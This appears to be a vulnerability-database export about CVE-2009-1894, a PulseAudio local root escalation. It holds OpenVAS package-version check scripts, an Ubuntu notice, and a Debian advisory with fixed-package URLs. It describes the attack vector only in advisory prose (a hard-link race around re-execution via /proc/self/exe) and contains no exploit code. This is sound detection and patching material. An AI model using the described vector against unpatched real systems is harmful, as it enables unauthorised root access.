$\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-1894\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200907-13 (pulseaudio)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"media-sound/pulseaudio\", unaffected: make_list(\"ge 0.9.9-r54\"), vulnerable: make_list(\"lt 0.9.9-r54\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:40:35", "description": "The remote host is missing an update to pulseaudio\nannounced via advisory DSA 1838-1.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 1838-1 (pulseaudio)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064476", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064476", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1838_1.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory DSA 1838-1 (pulseaudio)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Tavis Ormandy and Julien Tinnes discovered that the pulseaudio daemon\ndoes not drop privileges before re-executing itself, enabling local\nattackers to increase their privileges.\n\nThe old stable distribution (etch) is not affected by this issue.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 0.9.10-3+lenny1.\n\nFor the unstable distribution (sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your pulseaudio packages.\";\ntag_summary = \"The remote host is missing an update to pulseaudio\nannounced via advisory DSA 1838-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201838-1\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64476\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-1894\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n 
script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1838-1 (pulseaudio)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-zeroconf\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-hal-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse0\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-gconf-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulsecore5-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-x11\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-jack\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-lirc\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = 
isdpkgvuln(pkg:\"pulseaudio-esound-compat\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-hal\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-mainloop-glib0-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-lirc-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-mainloop-glib0\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-esound-compat-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-x11-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-utils-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-browse0-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-browse0\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse0-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-utils\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-zeroconf-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-dev\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-gconf\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulsecore5\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) 
{\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-jack-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:35", "description": "The remote host is missing an update to pulseaudio\nannounced via advisory MDVSA-2009:152.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:152 (pulseaudio)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064394", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064394", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_152.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:152 (pulseaudio)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been found and corrected in pulseaudio:\n\nTavis Ormandy and Julien Tinnes of the Google Security Team discovered\nthat pulseaudio, when installed setuid root, does not drop privileges\nbefore re-executing itself to achieve immediate bindings. This can\nbe exploited by a user who has write access to any directory on the\nfile system containing /usr/bin to gain local root access. The user\nneeds to exploit a race condition related to creating a hard link\n(CVE-2009-1894).\n\nThis update provides fixes for this vulnerability.\n\nAffected: 2008.1, 2009.0, 2009.1\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:152\";\ntag_summary = \"The remote host is missing an update to pulseaudio\nannounced via advisory MDVSA-2009:152.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64394\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-1894\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:152 (pulseaudio)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libpulseaudio0\", rpm:\"libpulseaudio0~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio-devel\", rpm:\"libpulseaudio-devel~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsecore5\", rpm:\"libpulsecore5~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseglib20\", rpm:\"libpulseglib20~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsezeroconf0\", rpm:\"libpulsezeroconf0~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio\", rpm:\"pulseaudio~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-esound-compat\", rpm:\"pulseaudio-esound-compat~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-bluetooth\", rpm:\"pulseaudio-module-bluetooth~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-gconf\", rpm:\"pulseaudio-module-gconf~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = 
isrpmvuln(pkg:\"pulseaudio-module-jack\", rpm:\"pulseaudio-module-jack~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-lirc\", rpm:\"pulseaudio-module-lirc~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-x11\", rpm:\"pulseaudio-module-x11~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-zeroconf\", rpm:\"pulseaudio-module-zeroconf~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-utils\", rpm:\"pulseaudio-utils~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio0\", rpm:\"lib64pulseaudio0~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio-devel\", rpm:\"lib64pulseaudio-devel~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsecore5\", rpm:\"lib64pulsecore5~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseglib20\", rpm:\"lib64pulseglib20~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsezeroconf0\", rpm:\"lib64pulsezeroconf0~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio0\", rpm:\"libpulseaudio0~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio-devel\", rpm:\"libpulseaudio-devel~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsecore5\", rpm:\"libpulsecore5~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = 
isrpmvuln(pkg:\"libpulseglib20\", rpm:\"libpulseglib20~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsezeroconf0\", rpm:\"libpulsezeroconf0~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio\", rpm:\"pulseaudio~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-esound-compat\", rpm:\"pulseaudio-esound-compat~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-bluetooth\", rpm:\"pulseaudio-module-bluetooth~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-gconf\", rpm:\"pulseaudio-module-gconf~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-jack\", rpm:\"pulseaudio-module-jack~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-lirc\", rpm:\"pulseaudio-module-lirc~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-x11\", rpm:\"pulseaudio-module-x11~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-zeroconf\", rpm:\"pulseaudio-module-zeroconf~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-utils\", rpm:\"pulseaudio-utils~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio0\", rpm:\"lib64pulseaudio0~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio-devel\", rpm:\"lib64pulseaudio-devel~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n 
report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsecore5\", rpm:\"lib64pulsecore5~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseglib20\", rpm:\"lib64pulseglib20~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsezeroconf0\", rpm:\"lib64pulsezeroconf0~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio0\", rpm:\"libpulseaudio0~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio-devel\", rpm:\"libpulseaudio-devel~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseglib20\", rpm:\"libpulseglib20~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsezeroconf0\", rpm:\"libpulsezeroconf0~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio\", rpm:\"pulseaudio~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-esound-compat\", rpm:\"pulseaudio-esound-compat~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-bluetooth\", rpm:\"pulseaudio-module-bluetooth~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-gconf\", rpm:\"pulseaudio-module-gconf~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-jack\", rpm:\"pulseaudio-module-jack~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-lirc\", rpm:\"pulseaudio-module-lirc~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) 
{\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-x11\", rpm:\"pulseaudio-module-x11~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-zeroconf\", rpm:\"pulseaudio-module-zeroconf~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-utils\", rpm:\"pulseaudio-utils~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio0\", rpm:\"lib64pulseaudio0~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio-devel\", rpm:\"lib64pulseaudio-devel~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseglib20\", rpm:\"lib64pulseglib20~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsezeroconf0\", rpm:\"lib64pulsezeroconf0~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2022-01-04T13:26:36", "description": "Tavis Ormandy, Julien Tinnes, and Yorick Koster discovered that PulseAudio did not \nsafely re-execute itself. 
A local attacker could exploit this to gain \nroot privileges.\n", "cvss3": {}, "published": "2009-07-16T00:00:00", "type": "ubuntu", "title": "PulseAudio vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1894"], "modified": "2009-07-16T00:00:00", "id": "USN-804-1", "href": "https://ubuntu.com/security/notices/USN-804-1", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2021-11-22T21:59:35", "description": "Race condition in PulseAudio 0.9.9, 0.9.10, and 0.9.14 allows local users\nto gain privileges via vectors involving creation of a hard link, related\nto the application setting LD_BIND_NOW to 1, and then calling execv on the\ntarget of the /proc/self/exe symlink.", "cvss3": {}, "published": "2009-07-17T00:00:00", "type": "ubuntucve", "title": "CVE-2009-1894", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1894"], "modified": "2009-07-17T00:00:00", "id": "UB:CVE-2009-1894", "href": "https://ubuntu.com/security/CVE-2009-1894", "cvss": {"score": 7.2, "vector": 
"AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2021-10-22T01:07:47", "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1838-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nJuly 18, 2009 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : pulseaudio\nVulnerability : privilege escalation\nProblem type : local\nDebian-specific: no\nCVE Id(s) : CVE-2009-1894\nDebian Bug : 537351\n\nTavis Ormandy and Julien Tinnes discovered that the pulseaudio daemon\ndoes not drop privileges before re-executing itself, enabling local\nattackers to increase their privileges.\n\nThe old stable distribution (etch) is not affected by this issue.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 0.9.10-3+lenny1.\n\nFor the unstable distribution (sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your pulseaudio packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\n
http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-dev_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 487892 202ea396c26028b0a80f6b114652ef02\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 236928 66145897cb2594f7922a858e865b34c3\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 476576 d1fa8daa880ad0d961cca194ffd1f03a\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 83924 84618cf2effb7106dc0dab0535f4543e\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0-dbg_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 309532 f24a84b7d79bde93b8f4f3f71d4a4122\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11-dbg_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 93012 69fdb275fbef3c08ea27435acd614247\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils-dbg_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 267248 51b3045e082e78268f2529891d424601\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 68670 a8cf46bb4c9bf56537d55a1a9ceecb54\n 